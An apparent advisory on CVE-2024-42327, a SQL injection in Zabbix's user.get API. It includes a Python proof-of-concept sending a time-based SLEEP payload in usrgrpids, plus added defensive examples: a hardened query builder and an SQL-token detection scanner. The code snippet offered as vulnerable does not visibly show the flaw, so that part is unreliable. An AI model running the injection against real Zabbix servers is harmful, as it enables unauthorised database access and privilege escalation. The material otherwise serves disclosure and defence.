CVE-2024-42327 - Zabbix Frontend User Role SQL Injection Vulnerability with Exploit Details
CVE-2024-42327 is a critical SQL injection vulnerability in the Zabbix frontend that can be triggered by non-admin user accounts with API access, potentially leading to unauthorized access, data manipulation, and other serious consequences. This post provides detailed information about the vulnerability, including the affected code, links to the original references, and exploit details.
Zabbix is an open-source monitoring tool for a wide range of IT components, including networks, servers, virtual machines, and cloud services. The Zabbix frontend is the web user interface through which users access and interact with the monitoring data, and it also exposes the JSON-RPC API used below.
Vulnerability Details
The vulnerability lies in the addRelatedObjects function of the CUser class. This function is called from CUser.get, which is available to every user with API access, regardless of role. This means that any non-admin account with the default User role, or any other role that grants API access, can trigger the vulnerability. It is particularly noteworthy because it allows privilege escalation and unauthorized access to the Zabbix frontend from a low-privileged account.
Below is the vulnerable code snippet from the CUser class (elided sections are marked with "..."):
    private function addRelatedObjects(array $options, array $users) {
        ...
        ...
        // Adding user groups.
        if ($options['selectUsrgrps'] !== null) {
            ...
            // Assembling the condition for the query.
            $sql_parts['where'][] = dbConditionInt('ug.userid', array_keys($users));
            ...
            $user_groups = DBfetchAssoc($rs);
            ...
        }
    }
The CUser.addRelatedObjects function does not properly validate or sanitize the request options it receives before they are used to build the database query, so an attacker can inject SQL and perform actions on the backend database.
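The fix for this class of bug is to validate every request option against its declared type before any SQL is assembled: ID lists must contain only integers, and select* field lists must contain only column names from an allowlist, with the IDs then bound as query parameters. The following is an added example, not code from this post or from Zabbix, that shows the defective string-building pattern next to a hardened builder. The column allowlist, the function names and the in-memory sqlite3 table standing in for the Zabbix database are all assumptions made for the example.

```python
import re
import sqlite3

# Allowlist of usrgrp columns a select* option may name. This set is
# constructed for the example; Zabbix's real schema definitions are not used.
USRGRP_COLUMNS = {"usrgrpid", "name", "gui_access", "users_status", "debug_mode"}
_IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


class InvalidParameter(ValueError):
    """Raised when an API parameter does not match its declared type."""


def validate_ids(raw) -> list:
    """Accept a scalar or a list of numeric IDs and return them as ints."""
    values = raw if isinstance(raw, list) else [raw]
    ids = []
    for value in values:
        # Only ints and digit-only strings qualify; bool is excluded explicitly.
        text = str(value) if isinstance(value, (int, str)) and not isinstance(value, bool) else ""
        if not text.isdigit():
            raise InvalidParameter(f"id must be numeric: {value!r}")
        ids.append(int(text))
    if not ids:
        raise InvalidParameter("at least one id is required")
    return ids


def validate_fields(raw, allowed) -> list:
    """Accept only bare identifiers that appear in the allowlist."""
    if not isinstance(raw, list):
        raise InvalidParameter("field list must be an array")
    fields = []
    for name in raw:
        if not isinstance(name, str) or not _IDENT_RE.match(name) or name not in allowed:
            raise InvalidParameter(f"unknown field: {name!r}")
        fields.append(name)
    return fields


def build_usrgrp_query_unsafe(select_usrgrps, usrgrpids) -> str:
    """The defective pattern: request values are concatenated straight into SQL."""
    return ("SELECT " + ", ".join(map(str, select_usrgrps))
            + " FROM usrgrp WHERE usrgrpid IN (" + ", ".join(map(str, usrgrpids)) + ")")


def build_usrgrp_query(select_usrgrps, usrgrpids):
    """Hardened form: validate both inputs, then bind the IDs as parameters."""
    fields = validate_fields(select_usrgrps, USRGRP_COLUMNS)
    ids = validate_ids(usrgrpids)
    placeholders = ", ".join("?" for _ in ids)
    sql = f"SELECT {', '.join(fields)} FROM usrgrp WHERE usrgrpid IN ({placeholders})"
    return sql, ids


def is_rejected(validator, *args) -> bool:
    """True if the validator raises InvalidParameter for the given input."""
    try:
        validator(*args)
    except InvalidParameter:
        return True
    return False


def run_demo() -> list:
    """Run the hardened query against a constructed in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usrgrp (usrgrpid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO usrgrp VALUES (?, ?)",
                     [(1, "Zabbix administrators"), (7, "Guests")])
    sql, params = build_usrgrp_query(["usrgrpid", "name"], [1, "7"])
    return sorted(conn.execute(sql, params).fetchall())


if __name__ == "__main__":
    probe = "1 or (SELECT 1 FROM (SELECT SLEEP(5))A)"   # the value used in the post's script
    print("unsafe builder:", build_usrgrp_query_unsafe(["usrgrpid"], [probe]))
    print("hardened builder rejects it:", is_rejected(validate_ids, probe))
    print("hardened query rows:", run_demo())
```

The important design point is that column names cannot be bound as parameters, so they must be checked against a fixed allowlist rather than escaped; IDs, by contrast, are validated for type and then passed to the driver as bound values, which keeps the query text independent of request content.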
Exploit Details
To exploit this vulnerability, an attacker can call the CUser.get function by sending a specially crafted request to the API. The request carries the malicious SQL used to manipulate the database, escalate user roles, or exfiltrate sensitive information.
The exploit script for this vulnerability is shown below:
    import requests

    ZABBIX_API_URL = 'https://zabbix.example.com/api_jsonrpc.php'
    ZABBIX_API_USER = 'username'
    ZABBIX_API_PASSWORD = 'password'
    headers = {'Content-Type': 'application/json-rpc'}

    # Log in to the Zabbix API and obtain a session token
    payload = {
        'jsonrpc': '2.0',
        'method': 'user.login',
        'params': {'user': ZABBIX_API_USER, 'password': ZABBIX_API_PASSWORD},
        'id': 1
    }
    response = requests.post(ZABBIX_API_URL, json=payload, headers=headers)
    auth_token = response.json()['result']

    # Trigger CVE-2024-42327 through user.get
    payload = {
        'jsonrpc': '2.0',
        'method': 'user.get',
        'params': {
            # The malicious SQL is placed in the usrgrpids parameter
            'usrgrpids': '1 or (SELECT 1 FROM (SELECT SLEEP(5))A)',
            'output': ['userid'],
            'selectUsrgrps': ['usrgrpid']
        },
        'auth': auth_token,
        'id': 2
    }
    response = requests.post(ZABBIX_API_URL, json=payload, headers=headers)
    print(response.json())
In this example, the script logs in to the Zabbix API and then sends the crafted user.get request whose payload contains the SQL code. Note that the usrgrpids parameter carries the SQL that triggers the vulnerability; an attacker can modify the payload to perform other database actions.
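Because the API request is a JSON-RPC POST body, neither web server access logs nor the Zabbix audit log show the parameter values, so detection has to happen where the body is visible. As a defender's counterpart to the script above, here is an added example, not code from this post or from Zabbix, that scans captured API requests for user.get calls whose parameter values contain SQL syntax and flags a slow response as corroboration of a time-based probe. It assumes a reverse proxy or WAF in front of the frontend that records each request as an object with the POST body, the client address and the response time; the record layout, the field names, the threshold and the three sample records are all constructed for the example.

```python
import json
import re
from dataclasses import dataclass, field

# Heuristic: user.get parameter values are numeric IDs, column names or short
# keywords, so SQL syntax inside one of them is worth an alert.
SQL_TOKENS = re.compile(r"\bSLEEP\b|\bSELECT\b|\bUNION\b|--|/\*|'|\(|\)", re.IGNORECASE)
SLOW_RESPONSE_MS = 4000  # constructed threshold; time-based probes delay the reply


@dataclass
class Finding:
    request_id: object
    client_ip: str
    reasons: list = field(default_factory=list)


def walk_strings(value, path="params"):
    """Yield (path, text) for every string leaf inside a JSON-RPC params value."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from walk_strings(item, f"{path}.{key}")
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from walk_strings(item, f"{path}[{index}]")
    elif isinstance(value, str):
        yield path, value


def inspect_request(record):
    """Return a Finding for a suspicious user.get call, else None."""
    try:
        body = json.loads(record["body"])
    except (ValueError, KeyError, TypeError):
        return None
    if not isinstance(body, dict) or body.get("method") != "user.get":
        return None
    reasons = []
    for path, text in walk_strings(body.get("params", {})):
        if SQL_TOKENS.search(text):
            reasons.append(f"SQL syntax in {path}: {text!r}")
    if reasons and record.get("response_ms", 0) >= SLOW_RESPONSE_MS:
        reasons.append(f"slow response ({record['response_ms']} ms) consistent with a time-based probe")
    if not reasons:
        return None
    return Finding(body.get("id"), record.get("client_ip", "?"), reasons)


def analyze(records) -> list:
    """Run inspect_request over every captured record and collect the findings."""
    return [f for f in (inspect_request(r) for r in records) if f is not None]


# Constructed sample capture: a benign user.get, the probe from the post,
# and a host.get whose search string legitimately contains an apostrophe.
SAMPLE_RECORDS = [
    {"client_ip": "10.0.0.5", "response_ms": 120,
     "body": json.dumps({"jsonrpc": "2.0", "method": "user.get", "id": 11, "auth": "REDACTED",
                         "params": {"output": ["userid"], "selectUsrgrps": ["usrgrpid"],
                                    "usrgrpids": ["7"]}})},
    {"client_ip": "10.0.0.9", "response_ms": 5200,
     "body": json.dumps({"jsonrpc": "2.0", "method": "user.get", "id": 2, "auth": "REDACTED",
                         "params": {"output": ["userid"], "selectUsrgrps": ["usrgrpid"],
                                    "usrgrpids": "1 or (SELECT 1 FROM (SELECT SLEEP(5))A)"}})},
    {"client_ip": "10.0.0.5", "response_ms": 90,
     "body": json.dumps({"jsonrpc": "2.0", "method": "host.get", "id": 12, "auth": "REDACTED",
                         "params": {"search": {"name": "O'Brien's lab"}}})},
]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(f"request {finding.request_id} from {finding.client_ip}:")
        for reason in finding.reasons:
            print("  -", reason)
```

The token list is deliberately narrow and scoped to user.get, where free-text parameters are not expected; applying the same regex to methods with search or filter strings (host.get in the sample) would produce false positives on ordinary apostrophes, which is why the third record is ignored. Pair the alert with the account name from the session token so that a low-privileged account issuing such requests stands out.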
Original References and Mitigation
The original vulnerability was reported on GitHub. Zabbix has released a patch for it, and users are encouraged to upgrade their Zabbix frontend installations to the latest version. It is also advisable to review and limit API access to the users who require it, follow the principle of least privilege when assigning roles, and maintain strong authentication credentials.
Conclusion
CVE-2024-42327 is a severe security vulnerability in the Zabbix frontend that allows non-admin users with API access to perform SQL injection. By understanding the affected code, the exploit details, and the original references, system administrators can take the necessary steps to mitigate this vulnerability and keep their monitoring infrastructure operating securely and reliably.
Timeline
Published on: 11/27/2024 12:15:20 UTC